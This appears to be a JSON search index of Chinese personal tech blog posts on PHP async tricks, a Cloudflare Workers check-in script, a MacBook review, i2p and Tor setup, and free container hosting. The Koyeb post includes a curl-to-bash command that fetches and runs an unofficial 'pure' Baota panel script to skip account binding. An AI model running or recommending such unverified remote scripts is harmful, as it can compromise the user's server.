"看来异步总是个难以解决的问题啊……起因最近，我在写一个ThinkPHP框架为基础的代码时遇到了一个问题，我希望在执行完一个操作后立马返回数据，然后在后台继续运行一个比较耗时的东西。我以前写的一个图片机器人其实也遇到过这种问题，为了解决返回很慢的问题，我采用了“离弦之箭”——使用file_get_contents函数请求自己，并且使用’timeout’参数来防止页面挂起，另外接收的部分使用ignore_user_abort(true)和set_time_limit(0)保证在请求结束时让程序依然继续运行。不过我用的是TP框架啊，不知道用那两个函数会不会出问题，还有这个“timeout”到底填多少比较合适也不确定，所以就想试试别的方法。探索异步的方法对于正规的情况来说，直接去网上搜如何让PHP异步执行代码，估计大多会说使用什么消息队列或者用什么Swoole框架吧，或者简单点用popen函数来fork一个进程，或者用什么fsockopen，貌似原理和我用file_get_contents函数差不多？其实吧我觉得从本质来说那个所谓的Swoole框架已经不算PHP的东西了，我觉得它更像是一个能通过http请求的popen函数，通过某种方式也一样是在本地去调用PHP脚本，只是可能用了些什么比如线程啥的特性提高了性能而已。   我看完这些选择之后很不满意，我不希望代码里出现popen这样的函数，说实话这是个危险的函数，绝大多数情况下服务器应该要禁用这种函数的，毕竟如果因为某些原因被人上传了PHP木马，他们可以直接用这个函数去执行命令了。至于什么乱七八糟的异步框架，想不想学是一方面，主要是我的项目还没有达到用这种东西的规模。那难不成我只能继续用之前图片机器人的那个“离弦之箭”的办法了吗？   后来我找到了一个很不错的函数，叫做fastcgi_finish_request，它可以在程序结束前把要输出的东西输出并且结束请求，不过使用它以后看文档说明好像说推荐再执行一下session_write_close函数，不然在这个程序执行完成前session会被锁住，没法操作。   不过这个函数只能在使用PHP-FPM的时候使用，如果是像Apache那样使用模块的方式运行PHP估计就用不了了，当然目前大多数环境应该都用的是Nginx+PHP-FPM吧，我反正是很少见到有人用Apache，虽然听说那样性能似乎会更好？   还有一个问题就是如果这个需要运行的脚本的时间太长了，以至于同时运行这个脚本的进程数量超过了pm.max_children，那么PHP-FPM就不能接受新的请求了，这也是一个缺陷。   另外在这种情况下我使用了TP框架还会遇到一个问题，那就是我不能使用return返回内容了，毕竟return了之后就不能执行其他函数了啊，所以就只能提前用echo之类的东西输出，执行完fastcgi_finish_request和所有需要长时间运行的代码后就只能return空值或者直接exit吧。感想看来用PHP来做异步果然是难事啊，不如说大多数程序想要处理好多线程的问题都挺难的吧，也许如果项目经常遇到这种问题，应该考虑用其他语言来编写了呢。" },{ "title": "使用CF Workers Cron触发器进行签到", "category": "", "tags": "Javascript, Cloudflare, cron, workers", "url": "/2023/02/22/cron.html", "date": "2023/02/22", "content": "Github Actions(×)，Cloudflare Workers(√)起因前几天，我的云·原神签到脚本被Github Ban掉了，其实我非常能理解这种情况，实际上用Actions做签到确实太重了。毕竟启动一个Actions需要的资源还算比较多，相当于开一个Docker容器，然而实际上做的事情却是很简单的请求一个接口罢了。而专业的全自动签到者有更专业的选择，比如QianDao，可以挂很多签到脚本，而且操作非常简单，只是需要服务器……而我为了能保证优质的签到水平，用这种东西显然还是不够稳当，服务器还会到期呢，所以像这种简单的事情我觉得还是应该用Cloudflare Workers来做更好。使用Cloudflare Workers Cron触发器其实有一说一，我的Javascript并不怎么样，不过至少文档我还是能看懂的，Workers进行网络请求不需要用XHR这样奇怪的东西，我感觉它应该是基于Node.js的，看了一眼是用fetch函数去进行网络请求的 （……又不是没用过，以前不还拿Workers写反代嘛……） 另外又看了看Cron触发器的文档，然后根据之前那个Python版，因为懒得分析哪些请求有用没用了，反正就三个都弄上吧……最终总算是知道怎么写了。于是代码如下：addEventListener('scheduled', event => {  event.waitUntil(    handleSchedule(event.scheduledTime)  )})async function handleSchedule(scheduledDate) {  const init = {    headers: {      'x-rpc-combo_token': '填入Token',      'x-rpc-client_type': '2',      'x-rpc-app_version': '3.4.0',      'x-rpc-sys_version': '11',      'x-rpc-channel': 'mihoyo',      'x-rpc-device_id': '填入设备ID',      'x-rpc-device_name': '填入手机名称',      'x-rpc-device_model': '填入手机型号',      'x-rpc-app_id': '1953439974',      'Referer': 'https://app.mihoyo.com',      'Host': 'api-cloudgame.mihoyo.com',      'Connection': 'Keep-Alive',      'Accept-Encoding': 'gzip',      'User-Agent': 'okhttp/4.9.0'    },  };  console.log(scheduledDate);  console.log(await fetch(\"https://api-cloudgame.mihoyo.com/hk4e_cg_cn/wallet/wallet/get\", init));  console.log(await fetch(\"https://api-cloudgame.mihoyo.com/hk4e_cg_cn/gamer/api/getAnnouncementInfo\", init));  console.log(await fetch(\"https://api-cloudgame.mihoyo.com/hk4e_cg_cn/gamer/api/listNotifications?status=NotificationStatusUnread&type=NotificationTypePopup&is_sort=true\", init));}至于怎么获取Token之类的参数，用HttpCanary之类的抓包就好了，不过要先启动云·原神之后再抓包，不然程序貌似会检验SSL证书是不是合法的，然后就退出登录了……抓到之后随便点开一个请求里面就有上面的值了，根据情况填到上面就行了。   还有Workers的配置就很简单了，把代码粘到Workers里面之后在触发器里面的“Cron 触发器”中设定时间就行了，一般就一天一次，反正它能自动生成Cron表达式，也不用自己写，要不写“0 0 * * *”也行，然后就什么都不用做了。感想写完这个签到脚本之后，我觉得应该鼓励大家都去使用Workers这种方法去进行签到，Cloudflare可不会因为这种东西去Ban你的东西，至于Actions应该更多用于更需要计算资源的事情，比如编译代码啊，或者生成静态HTML还是日报之类的，签到啥的确实是太浪费了（而且还会Ban）。   还有就是云函数啥的……不过那个貌似本质来说还是Docker，它运行时是一个完整的环境，不像Workers那样应该是运行在一个更加轻量的沙箱里的，也许还更环保呢XD。" },{ "title": "MacBook Pro 2022 13寸使用体验", "category": "", "tags": "Apple, MacBook, 体验", "url": "/2023/02/03/mbp.html", "date": "2023/02/03", "content": "好用，但又不完全好用起因最近家里人送了我一台搭载了Apple M2芯片的MacBook Pro 2022 13寸笔记本电脑，虽然我以前没用过MacOS，不过我其实本来就打算买一台的，只是我打算在我现在使用的天选坏了或者彻底过时的时候再换……不过问题也不大，早有早享受嘛。想买MacBook的理由其实以前我是不喜欢买像苹果这种性价比低的产品的，而且以前的MacBook确实也很烂，CPU是很垃圾的Intel几款核心数少，就很普通的那种电脑，然后要是刷成Windows……估计花一半的价格就能买个同等性能的Windows轻薄本了。而且还有什么“梦幻单热管”之类的问题，性能和寿命都非常差。不过2020年出的Apple Silicon M系列芯片还是相当厉害的，性能提升是一方面，功耗发热之类的表现都非常的不错，不仅使用很安静，续航还很长。这时候就让我回想起我以前想整的云游戏+轻薄本方案了（当然MacBook在轻薄本里实在是太贵了），毕竟我在用游戏本的这几年里，感觉游戏本还是挺不方便的，重倒是还好，主要是续航不太行，我的游戏本开省电模式基本上用4个小时就没电了，而且风扇声音也很大，有时候想不插电使用效果都不太好。另外我也不怎么打游戏，很多时候我其实不需要性能有多强，需要的时候再租服务器还是租云电脑都是个不错的选择。MacBook的使用体验初体验刚拿到这个MacBook之后从使用上来说倒是没有特别的不适应，我不知道是苹果有优化过用户体验还是单纯因为自己用了一下，上手还是挺容易的，没有因为是第一次仔细使用MacOS以及Windows不一样的操作方式而不会用，要硬说的话感觉也就是标题栏的关闭键在左边不太熟悉吧，用两天就好了，不过ctrl弄成两个还是挺不熟悉的，搞了control和command两个按键，导致在远程连接Windows以及使用终端时操作都挺别扭的，比如复制文本，在Windows上按control+c复制然后在MacOS上按command+v粘贴……不是很人性化。   除了系统本身的体验之外，MacBook的触控板使用也非常的不错。大是一方面，可以不抬手就完成移动鼠标和单击这个操作也很不错，因为整个触摸板都可以按下去，而且还有两段，只不过重击我还没用过，关于手势和快捷键估计得用很长一段时间才会熟悉吧，不过还好就算不熟悉也不怎么影响使用。应用体验刚开始使用的时候我最想安装的就是Microsoft Remote Desktop，因为之前有说要配合“云”一起使用，那自然是要有个能远程连接的东西。那个软件国区Apple账号还没有，我还得搜教程把地域改成其他国家……安装好之后连接上我办公用的电脑效果还不错，用起来的感觉就像在MacBook上安装了Windows一样，不过问题就是我前面说的ctrl键问题，感觉比较难受……   随后我就安装了VSCode，之前我在Windows电脑上安装的是Notepad++，我之所以不想用VSCode就单纯因为它多整了一个浏览器感觉不太爽，那个Notepad++作者搞什么键政辱华啥的我都不在乎，但是他声明有可能会随机修改用户数据这个我就不太能接受了，无论这是不是个玩笑，但是但凡有一点点这种可能性，我都不太敢相信这个软件了，当然MacOS本来也装不了🤣，另外我还想要用Github Copilot插件，所以就考虑了一下还是用VSCode吧。   然后在操作的过程中感觉连接不是很通畅，下了个V2rayU。看着还挺不错，结果导入的时候不支持自定义SNI，搞得我只能自己修改配置文件，感觉不太好……不过配置好了之后还是挺不错的，总比自己运行V2ray然后设置代理方便吧。   然后就是虚拟机了，毕竟MacOS支持的软件很少，有时候可能无论如何都要使用Windows，如果手头没个Windows就麻烦了，所以还得装个Windows的虚拟机。不过我这个MacBook是8G内存的版本，分配的时候只能分个4G，Windows11启动大概吃掉1～2G，现在软件吃内存也很厉害，8G MacBook装虚拟机还是有点吃力了……当然为了应急吃力也还是得装吧。然后就是创建虚拟机的软件，MacOS一般推荐的是Parallels Desktop，不过那是个付费软件，我买不起那种东西，那对于ARM64架构的目前应该就VMWare Fusion Player、VirtualBox和UTM吧，据说UTM基于QEMU功能更加强大，我也懒得三款都测一遍了，而且UTM有上架Apple Store的版本用着也更放心。   整虚拟机的时候为了搞Windows11的镜像，我按着教程又下了个HomeBrew，据说这个就相当于在MacOS上的apt一样的东西了，之后安装命令行需要的软件就方便很多了。   另外为了能看Bilibili港澳台的动画，我还需要安装Tampermonkey插件，看了一眼还要2USD……看了看旁边还有一个叫做Stay的插件能提供差不多的功能还是免费的于是也装了一个。虽然也不是不能装Chrome，不过对我来说，只要系统自带的浏览器不是IE那种大多数网页都没法访问的情况，那就不会去安装第三方的浏览器了，不过Safari装插件还是挺麻烦的，也没有Chrome的插件多，还好油猴的脚本很多就可以代替那些插件的功能了，所以装个Stay就够用了。   还有，为了处理文档，Microsoft Office试了一下要花钱，还不能用E5试用的订阅，没办法就只能再装个WPS Office了，MacOS上的WPS Office倒是还好，没有Windows上那么多广告，不过好多模板还有些什么转换之类的功能还是付费的，不过我一般用不上，应该影响也不大。   最后为了能连接手机传输文件，安装了一个Android文件传输，MacOS居然原生不支持MTP协议，实在是不太行……这个电脑就两个Type-C的USB口，充电线是两边都是C口的，用来连接手机还挺不错的。游戏体验众所周知，MacBook很不适合用来打游戏，因为大多数游戏都是在Windows上编写的。不过我已经安装了Windows11ARM的虚拟机，如果用来跑游戏效果会怎么样呢？我从我原来用的电脑上传了一个Galgame过来，打开试了一下，卡的不得了，不知道是因为没法调用显卡还是怎么回事，感觉帧率就10fps的样子，我在我原来的电脑上运行了一下试了试，运行非常流畅。连运行Galgame都这么垃圾，其他游戏估计更不用说了。不过这估计也是因为是虚拟机的缘故，所以我想找找MacOS支持的游戏。去Apple Store下载游戏……都要花钱，不过我看到我的MacBook作为Pro，有个Touch Bar，所以想整个Touch Bar的游戏，正好看到了个打砖块，试了试效果还不错。   当然用MacBook光看打砖块流畅那就没啥意义了，所以再升点级，试试三维弹球吧😝，之前我在网上看到一个开源版本的三维弹球，叫做SpaceCadetPinball，是用Windows XP自带的那个版本逆向出来的，我看了一眼是支持在MacOS上运行的，于是就下载下来编译了一下，效果确实不错，不过我又试了一下在Windows原生的版本，一样很流畅啊😂，而且不知道为什么感觉开源的这个版本缓冲器不太对劲，弹的没原生的舒服……这试游戏没必要针对弹球游戏吧😂。   不过我也不知道MacOS支持什么游戏，想了想我在Epic Games上白嫖了不少游戏，干脆下载下来看看都有啥支持吧。看了一圈while True:learn()居然支持，然后就下载下来试了一下，不过这个基本上也没啥特效啥的，就是那种逻辑推理游戏，也展现不出什么，不过我原来的电脑运行这个游戏的时候风扇就开始高速转起来了，MacBook能完全没声音应该还是证明有点东西的。   不过我也不一定非要考虑电脑游戏，我也可以考虑一下手机游戏，毕竟MacOS在M系列芯片上是可以运行iOS软件的，不过系统做了一些限制，不是所有都支持，所以我就下了一个PlayCover，在上面安装了公主连结 Re:Dive。效果还挺不错的，完全不卡，不过运行的时候可以明显感觉有点开始发热了，我浏览网页看视频的时候完全不发热，看来这个游戏还是挺费资源的。综合体验经过这些天的使用，我感触最深的就是这台电脑的续航了，别说一天不充电，感觉两三天不充电都没问题，毕竟标称续航是20小时，可以算是续航最强的笔记本电脑了。不过这样的话感觉就更像是大号手机/平板那样了，用的时候不充电，24小时不用关机，感觉和手机差不多，相比平板功能还是更多，要是说用iPad那个东西可没有终端，越狱也还是比不了MacOS。而相比Android平板，我之前还在上面试过Termux，不过问题和越狱差不多，支持的东西还是不如MacOS，虽然MacOS也不是开源的，但是对我来说我感觉那个终端就像Linux那个终端差不多，加上HomeBrew效果还是挺不错的，另外MacBook比平板的续航更长，就是重量也更重了。感受总的来说，从体验上来说还是挺不错的，触控板的操作还有续航啥的都挺不错的，还有虽然这款MacBook是用的2016年的模具，但是我真没用过Touch Bar，可能确实挺鸡肋的，但是还是挺好看的，Fn功能键也没有很高的使用频率，不过感觉可能也就这样了，只能拿来看看视频，写点代码啥的，有些关键性的东西，以及打Galgame都还只能用我原来的Windows电脑，还好这些可能不是用的特别多的情况，也许调整好之后我可以把我所有的东西都迁到这个MacBook上，然后关键的东西用云电脑呢。" },{ "title": "年终总结", "category": "", "tags": "总结", "url": "/2023/01/01/summary.html", "date": "2023/01/01", "content": "</2022><2023……无止尽的……？结局？本来这篇文章打算昨天就写的……结果昨天不知道什么原因发烧了😂。想着是不是感染了COVID-19，不过拿抗原试纸测了一下好像也没事。emmmm本来就很糟糕的一年在最后也不忘送我一份礼物是吧😂。2022年都干了什么？2022年我感觉更加的什么都不记得了……这种问题的严重程度就像从没有经历过这些事情一样。对于电脑来说什么东西最重要呢？应该是硬盘上面存储的数据吧，毕竟电脑有价，数据无价。而对于人来说那就是记忆了吧。在我看来所有的想法和情感都是基于记忆实时演算出来的结果，不过很遗憾的是人的记忆不能备份，坏了就再也找不回来了，就算用日记记录，也只是生成了新的记忆而已。所以虽然能知道发生了些什么，不过心中却毫无波动。   我看了看2022年写的文章，基本上都是些解决问题的方案，文章也比之前写的少了，大概是因为记忆的积累变少了所以也想不出更多的东西了，不过这也许不是一件坏事，毕竟没有记忆就没有烦恼了，这也就是为什么我现在内心毫无波动吧。    至于2022年周围发生的事情……可能是越来越糟糕了，以致于我感觉再有两年差不多人类该灭绝了🤣，不过如果能在有生之年看到人类的末日也不算坏事，毕竟人类已经在这个星球也存在了几十万年了，按平均100年左右的寿命来算，在有生之年遇到人类末日（假设在2024年）的概率大概有个几十万分之一吧 （感觉不太清醒，算错了不要叫我“数学奇才”，还有预言如果成真了也别🔪我🤣） 。2023年想要做什么？毕竟没有过去就看不清未来，当然如果就只是正常的活下去感觉也就是发生了什么去应对什么吧。2022年的Mayx Forever计划因为Github的激励完成的还是挺不错的，看看博客的代理列表，反代先不论，镜像站也整了不少，而且还在IPFS、AR和IC上整了备份，尽可能保证了博客能存活的概率。不过要是说不止发生了人类灭绝的问题，世界也毁灭了那当然所作的所有事情都失去了任何意义。当然如果考虑意义的话就没有意义了，其实就算啥也没有死了还是啥也没有，本来也看不见未来，期望其他人看到也只是活着的时候在做梦罢了。不过也不是完全没意义，毕竟这套方案除了在自己遇到问题保留信息之外还有反审查的的功能，当我整出一套成熟的方案时，其他人也可以用我曾经发现过的东西来做自己想做的事情。   至于其他的事情……也快到毕业的时候了，最后只要能正常的毕业那就还能继续漂流下去（不然就只能靠接单养活自己了（可能也不完全是坏事））。   总之接下来也没什么可期待的，我就想见证末日而已。总结这下感觉……总之接下来无论是我还是其他人可能都不会变得更好吧。其他的我也想不出来什么了。" },{ "title": "为自己的i2p站点添加一个SSL证书", "category": "", "tags": "SSL, i2p, 隐私, 网络", "url": "/2022/12/26/i2p-ssl.html", "date": "2022/12/26", "content": "虽然没啥用，不过很有意思所以还是整一个！起因在上个月，我用i2pd和tor在两个不同的匿名网络上试着建了网站，不过因为这些网络的特性，他们不需要使用HTTPS访问就能保证内容不被窃取和篡改。不过SSL证书的意义不止这些，还有一个很重要的意义是验证网站身份，比如Facebook就有一个被信任的EV SSL证书，它的意义就是在保证其他人也偷偷算了一个facebook开头的域名（家用电脑大概花1天左右的时间就能算出来）时能很轻易的知道这个网站是不是真的Facebook的网站，因为EV SSL证书的审核很严格，基本上没办法去伪造一个相同公司的。Onion的DV SSL我查了一下，普通人倒是也能整，有家叫HARICA的证书商家每年花30EUR就可以在上面买一个。不过我嘛……肯定是不愿意花钱的，所以就打消了整Onion的证书的想法。探索I2P的SSL证书那i2p域名呢？因为Tor有一定的政府背景，而且有大公司撑腰，所以受到了那些管理互联网的组织的承认，才会被允许注册可信的SSL证书。而i2p怎么说还是一个比较小的项目，虽然它可能是除了Tor外第二大的匿名路由网络（不是Freenet之类的共享内容的网络，那种东西没法交互），不过没有靠山，就不会被那些管理互联网的组织所承认，也就不可能允许注册可信的SSL证书……那难道就没有办法了吗？作为社区动力的项目，什么政府啊，还是什么标准化的组织都是没用的东西，不被承认可以自己承认！正好我在逛i2p那些网站的时候看到了一个由i2pd的开发团队PurpleI2P所维护的一个CA，从这个CA签名的证书虽然也只是自签名的，但是他们开发的浏览器I2PdBrowser内嵌了这个CA证书，所以也可以看作是可信的证书了（至少在这个浏览器上是）。具体的申请方法很简单，网站上都有说，给作者发邮件申请就行了，至于怎么用普通的邮箱给mail.i2p发邮件……只要把它替换成官方网关i2pmail.org就可以了。   虽然证书很容易申请，但是申请下来的证书部署到网站上之后怎么才能被访问那还是挺麻烦的。因为网络上完全没有相关的教程，毕竟i2p用的人就少，i2pd更少，用i2pd还整SSL证书的人可能全世界一只手都数得过来😂。这没办法我只能先看着i2pd的文档先自己琢磨，结果怎么整效果都不对……没办法就只好问作者了，他回复的原文如下：  It  must  be added like current tunnel for HTTP with same key. Example with HTTP and HTTPS:  [website]type = httphost = 127.0.0.1port = 8080inport = 80inbound.length = 2outbound.length = 2inbound.quantity = 3outbound.quantity = 3gzip = falsekeys = website.dat[website-SSL]type = serverhost = 127.0.0.1port = 8443inport = 443keys = website.dat    Note  that  I  use  same  key file both for HTTP and HTTPS tunnel, and HTTPS  (443  port)  using type server, because i2pd mustn’t interact with encrypted by SSL data. Also, you can skip the i2cp options in the second tunnel, because they apply  to  all  tunnels  with the same key. The main thing is to write them only in the first tunnel.这下我总算搞明白我之前配置的问题出在哪了😂，它文档里写的关于inport的说明是“what port at local destination server tunnel listens to. Same as port by default”，我看到它说的“local destination”以为是隧道访问的那个端口，结果是面向隐形网络的端口……怪不得我配置之后返回的证书老是443端口的证书……而且http隧道文档里也没有说到关于inport的参数啊，还有那个莫名其妙的ssl参数……这文档写的真是有点不太行……   按照邮件说明配置好之后总算可以正常访问了，试了一下用I2PdBrowser访问我的网站终于出现了代表加密的小锁。感想不过他们对生成证书的要求实在是不严格，我不需要证明任何东西，就能获得任意i2p网站的SSL证书（当然，也起不到验证网站身份的功能），不过由于这个网络的特点，也没办法中间人攻击，而且本来用的人就少，估计他们也是当玩吧😂，所以也没有认真搞。另外其实那个域名系统也一样，注册也很随便……   不过搞的过程还是挺有意思的，如果有谁有兴趣也可以搞一个玩玩。" },{ "title": "如何自定义宝塔亚马逊S3云存储插件的端点", "category": "", "tags": "S3, 插件", "url": "/2022/12/12/bt-s3-comp.html", "date": "2022/12/12", "content": "会点Python就可以自己改插件啦！起因上次用Koyeb安装了宝塔面板之后在上面写了些测试用的网站，不过因为我开发网站的时候喜欢直接在面板上面改，本地基本上都是没代码备份的，不过最近宝塔面板好像有不少关于漏洞的传言，为了避免由于各种奇怪的事情把我的网站搞没，我想整点备份用的插件。插件的使用与修改宝塔面板的插件还是挺多的，想要备份的话支持的平台也挺多的，而且都很人性化，功能啥的小白也能操作的来。不过考虑到宝塔面板的不安全性，我也不希望我常用的网盘挂在上面当备份，万一被攻破了我网盘上的文件就被别人拿走了。   综合考虑下来，什么OSS还是什么云盘感觉还是不太好选择，但是S3 API兼容的平台还挺多的，比如我之前用过的4EVERLAND也有存储桶。另外之前随便逛的时候注册了一个Filebase也支持（都是0门槛免费5GB）。所以想用这个存我的备份文件。   不过宝塔面板上带的亚马逊S3云存储插件只能用亚马逊的云服务，不能改endpoint……但是我也不想注册AWS，除了看着难受，不人性化，而且好像免费用要绑信用卡？（最主要是我想备份到Filebase， 不然白注册了？😂 ）   所以我就去看了看这个插件的源代码，还好代码是Python的，理解起来倒是不难。最开始我是想着它会不会是直接通过HTTP API访问AWS S3的端点，所以就直接各种搜索，但是找了半天没看到一个和AWS有关的域名……看来投机取巧不太行……就只能慢慢看代码了。最终找了半天发现它好像用的一个叫boto3的库来连接AWS的……这名字起的是真的……我完全没法从这个名字中看出来它和AWS有半毛钱关系（好像因为Boto是亚马逊河豚，据说是粉色的），尤其它代码里是通过from boto3 import client这种方式引入的，代码里就没有和boto3有关系的词了……client这个词又很通用，这代码看着是真的难受啊……   不过还好最终起码找到要改的地方了，其实很简单，它的“/www/server/panel/plugin/aws_s3/s3lib/client/aws_s3.py”这个文件是引入的关键，其中build_auth()方法是连接S3的关键，我在网上搜了一下boto3，它也是支持自定义端点的，只要在第100行后面加一个endpoint_url参数就可以了，比如Filebase就加一句endpoint_url=\"https://s3.filebase.com\"，保存之后其他的就在面板上配置就行了。感想这下就能看出来宝塔是有多垃圾了吧，明明就一个参数就能搞定的事情，它偏偏不给你加，而且就这样还啥功能都不支持，文件夹也删不了，也没法在面板里上传/下载文件，而且还要给你装个boto3的依赖，啥都不支持还要装个全功能的依赖，实在是太垃圾了。不过小白不会写代码，再垃圾的东西该用还得用吧🤣。" },{ "title": "体验小白也会使用的免费容器云", "category": "", "tags": "Docker, 容器, 免费", "url": "/2022/11/29/free-server.html", "date": "2022/11/29", "content": "Heroku虽然倒了，但是我们还有更多的选择起因从昨天开始，Heroku就不再提供免费的容器云服务了，虽然我有Github的学生包，但是试了一下要绑银行卡就算了。不过虽然这么说，我其实一次也没用过Heroku，因为它要安装奇奇怪怪的软件用起来很不人性化。不过最近也正好需要一个服务器来供我测试，那应该怎么办呢？Koyeb的体验后来我在寻找的时候找到了一家叫做Koyeb的平台，也是容器云，还是免费的。用Github登录之后就可以使用了，试了一下感觉很不错啊，它和其他免费容器云最不一样的可能就是它能直接部署Docker Hub上的项目，不用在Github上新建乱七八糟的仓库，也不用安装乱七八糟的软件，非常的人性化啊。   既然能部署Docker Hub的项目，那可选择的余地就太大了，我直接随便部署一个发行版就能当免费的VPS来用，不过既然能直接部署了，还是安点什么好吧……我想了想干脆安装个宝塔面板吧，正好他们官方也提供了Docker镜像，直接部署就行，另外为了正常访问，需要映射8888端口，另外为了方便访问网站，还要映射一个80端口。不过它只给了一个地址，所以如果要映射多个端口就只能设定路径……像我是给面板设定的根目录，方便我配置，至于网站嘛……之后再考虑吧，这里我先填了一个/app的路径便于之后使用。   这样安装出来的面板直接根据镜像文档的说明就可以登录了，不过登录之后会要求绑定手机号……我不太想整这个东西，于是在网上找了个宝塔纯净版，在Koyeb的Console里面执行：curl http://v7.hostcli.com/install/update6.sh|bash运行之后就可以跳过绑定宝塔账号的步骤了，还能安装企业版插件，还是挺不错的。不过不知道是什么问题，网页端的SSH好像用不了……这个建议使用frp等方式反代一下再用，免费的frp服务器还是比较好找的。建站方法因为之前已经映射了80端口，所以直接用提供的链接就能打开之前建好的网站（例如example.koyeb.app/app）。不过对于有些网站来说有个问题，那就是它的程序可能资源不允许在不是根目录的地方，这样它读取文件的时候就会从宝塔面板的路径读取了，然后就会出现例如404的错误。为了解决这个问题我想了一下，干脆让Cloudflare Workers反代它吧（理论上应该绑定域名然后在Cloudflare上配置重写规则应该也行），所以就写了个简单的脚本：addEventListener(    \"fetch\",event => {        let url=new URL(event.request.url);        url.protocol=\"https\";        url.hostname=\"example.koyeb.app\";        url.pathname=\"/app\" + event.request.url.substring(event.request.url.indexOf('/',8),(event.request.url + \"?\").indexOf('?'));        let request=new Request(url,event.request);        event. respondWith(            fetch(request)        )    })这样访问网站的时候就不会遇到404的情况了。不过这样做还有一个缺陷就是HTTP_HOST环境变量会是错的，有些程序会读取它，导致链接可能会出问题，这种情况就只能通过修改fastcgi的环境变量配置文件来解决了……搭梯子的方法一般租服务器，可能除了搭网站，就是搭梯子了。所以我想在建站的同时搭个梯子，正好网站也算是梯子的伪装了。   这次我搭梯子不想用v2ray了，我想换个之前在Github上看到的一个重新实现的v2ray，叫verysimple，据说速度比v2ray要快很多，不过它用的那个toml我看的不是很明白，因为之前配了Tor和i2p，用到了路由功能，它这个路由功能……也没个文档，本来想给自己的服务器换一下，这看起来不知道怎么配就算了。不过在这个免费的测试机上不需要有那么多功能，只是当个普通梯子还是很简单的，而且它的配置文件能通过交互模式生成还挺有意思的。   像我的话配置文件很简单，就是这个样子：[[listen]]  tag = \"my_proxy\"  host = \"***\"  ip = \"0.0.0.0\"  port = 8080  xver = 0  tls = false  path = \"***\"  advancedLayer = \"ws\"  protocol = \"vless\"  uuid = \"***\"  version = 0[[dial]]  port = 0  xver = 0  protocol = \"direct\"  version = 0然后在我的网站的nginx里配置相应的路由：    location /***{  \t\tproxy_set_header X-Original-Host $host;  \t\tproxy_set_header X-Real-IP $remote_addr;  \t\tproxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;  \t\tproxy_set_header Host ***;  \t\tproxy_http_version 1.1;  \t\tproxy_set_header Upgrade $http_upgrade;  \t\tproxy_set_header Connection \"Upgrade\";  \t\tproxy_pass http://127.0.0.1:8080;    }就可以正常使用了，试了一下效果还不错，不知道这个流量是怎么算的，Koyeb的面板上也没有关于流量费的介绍……难不成是不限流量？感想免费的东西虽好，不过既然Heroku都被薅没了，Koyeb这种小白都能免费用的容器云……只能说且用且珍惜了……" },{ "title": "i2pd在服务器上的使用体验", "category": "", "tags": "i2p, 隐私, 网络", "url": "/2022/11/23/i2p.html", "date": "2022/11/23", "content": "Java果不其然是垃圾😁，i2p还是得靠其他语言支撑！起因前几天我在服务器上体验了Tor，让我的代理在访问互联网的同时也能访问洋葱网络上的网站。其实我整完这个之后也想整出能访问i2p的功能，只是我之前体验了下官方的I2P客户端，体验不是一般的差，再加上还是Java写的，导致我对i2p的印象不怎么好。   不过最近我看到有一个使用C++实现的i2p，叫i2pd。其他先不说，只要不是Java写的首先加一分，闭着眼睛都知道它的体验一定比官方的Java I2P体验要好得多。随后我就按照官网的文档在我的服务器上安装了一下。探索过程安装完成之后使用也非常的简单，虽然它也有Web管理界面，但是为了安全我的服务器上开了几层防火墙，也懒得配置所以也没有登进去看一眼。不过使用还是相当简单的，它和官方的I2P一样也是可以直接用4444端口的HTTP代理连接隐形网络，为了能让我的电脑也能上，我也在我的v2ray配置文件基于上次写的照猫画虎的加了几句规则：{  \"log\": {    \"loglevel\": \"warning\"  },  \"routing\": {    \"domainStrategy\": \"AsIs\",    \"strategy\": \"rules\",    \"settings\": {      \"rules\": [        {          \"type\": \"field\",          \"domain\": [            \"regexp:\\\\.onion$\"          ],          \"outboundTag\": \"tor\"        },        {          \"type\": \"field\",          \"domain\": [            \"regexp:\\\\.i2p$\"          ],          \"outboundTag\": \"i2p\"        },        {          \"type\": \"field\",          \"outboundTag\": \"block\",          \"protocol\": [            \"bittorrent\"          ]        }      ]    }  },  \"inbounds\": [    {      \"sniffing\": {        \"enabled\": true,        \"destOverride\": [          \"http\",          \"tls\"        ]      },      \"listen\": \"/dev/shm/proxy.sock\",      \"protocol\": \"vless\",      \"settings\": {        \"udp\": false,        \"clients\": [          {            \"id\": \"***\",            \"alterId\": 0,            \"flow\": \"\"          }        ],        \"decryption\": \"none\",        \"allowTransparent\": false      },      \"streamSettings\": {        \"network\": \"ws\",        \"security\": \"none\",        \"wsSettings\": {          \"path\": \"***\",          \"headers\": {            \"Host\": \"***\"          }        }      }    }  ],  \"outbounds\": [    {      \"protocol\": \"freedom\"    },    {      \"protocol\": \"socks\",      \"settings\": {        \"servers\": [          {            \"address\": \"127.0.0.1\",            \"port\": 9050          }        ]      },      \"tag\": \"tor\"    },    {      \"protocol\": \"http\",      \"settings\": {        \"servers\": [          {            \"address\": \"127.0.0.1\",            \"port\": 4444          }        ]      },      \"tag\": \"i2p\"    },    {      \"protocol\": \"blackhole\",      \"tag\": \"block\"    }  ]}顺便再提醒一下，这样的配置不能匿名，仅仅是一种更方便访问隐形网络的方式，如果有匿名需要，建议使用Firefox或者Tor浏览器，安装I2P的插件并设置相应的代理，或者使用i2pdbrowser（也是基于Firefox的）。   另外如果只是访问还有一种更加不匿名的方式，i2p也有类似tor2web那样的东西，不过很少，我找了一圈只找到了i2phides.me可以用。当然也是强烈不推荐的，在不知明细的情况下使用这种东西是会被中间人攻击+记录访问日志的。   配置好之后试着用电脑上了一下，体验相当好，比之前在手机和电脑上安装的官方的I2P Java客户端速度快多了，随便开了几个网站感觉甚至比上次配置的Tor速度还快，不过这可能只是延迟比较低，之后我找了几个文件下载Tor的实际网速还是更快一些，I2P虽然感觉延迟低但是实际下载速度也只有1Mb/s左右。建站体验隐形网络比洋葱网络感觉更好的一点大概就是它有一套自己的域名解析系统，洋葱网络访问的时候基本上没办法记忆，想整个好看的域名还得算。隐形网络的话有了域名解析系统就可以不用花大力气去算vanity address了。不过我搞这个也算是玩了，算一个也挺好。想整的话可以用i2pd提供的一套工具i2pd-tools，里面有个叫vain的工具可以用来算vanity address。不过实际上试了一下感觉没有Tor里的mkp224o好用，速度慢是一方面，比较离谱的是它还能计算出错，6位以下的自定义字母倒是能正常计算，6位以上的就会计算错误，好不容易计算出一个，结果检验的时候报“bad key file format”……看那个仓库好像人家也不怎么想解决的样子，大概也因为有域名解析系统的原因，网上也没有其他人开发这样的程序……   